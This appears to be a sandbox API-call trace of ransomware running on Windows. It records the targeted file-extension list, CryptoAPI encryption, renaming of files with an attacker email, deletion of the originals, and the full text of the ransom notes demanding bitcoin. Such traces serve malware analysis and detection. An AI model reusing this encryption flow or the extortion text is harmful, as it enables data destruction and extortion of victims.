	[0171.868] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.868] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.868] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.869] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.871] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x157, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x157, lpOverlapped=0x0) returned 1
	[0171.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.874] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb5d8) returned 1
	[0171.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.877] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0171.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.877] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.878] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb93f0) returned 1
	[0171.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.878] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x157, dwBufLen=0x157 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x160) returned 1
	[0171.878] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.878] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x157 | out: Destination=0xfdc770) 
	[0171.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.879] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x157, dwBufLen=0x160 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x160) returned 1
	[0171.879] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.880] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0171.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.880] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0171.880] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.880] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0171.880] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.881] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.881] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.881] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0171.883] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0171.883] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0171.884] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x160, lpOverlapped=0x0) returned 1
	[0171.888] CloseHandle (hObject=0x3a0) returned 1
	[0171.889] CloseHandle (hObject=0x39c) returned 1
	[0171.890] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml")) returned 1
	[0171.894] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml")) returned 0
	[0171.894] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x157, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0171.894] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0171.895] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0171.896] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov"
	[0171.896] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*"
	[0171.896] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.897] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.897] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0171.897] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.898] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.898] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.907] CloseHandle (hObject=0x390) returned 1
	[0171.908] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.908] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.909] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0171.910] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.910] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.910] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.911] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.911] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0171.911] CloseHandle (hObject=0x390) returned 1
	[0171.911] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.912] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.912] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.912] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0171.912] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.918] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.918] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0171.921] CloseHandle (hObject=0x390) returned 1
	[0171.922] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.922] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.923] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0171.924] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.924] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.924] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.925] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.925] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0171.925] CloseHandle (hObject=0x390) returned 1
	[0171.925] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7ffc49e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80010ddc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0171.926] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*") returned 89
	[0171.926] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.926] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*") returned 0x59
	[0171.926] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.926] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0171.926] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.927] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0171.927] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.927] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0171.927] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
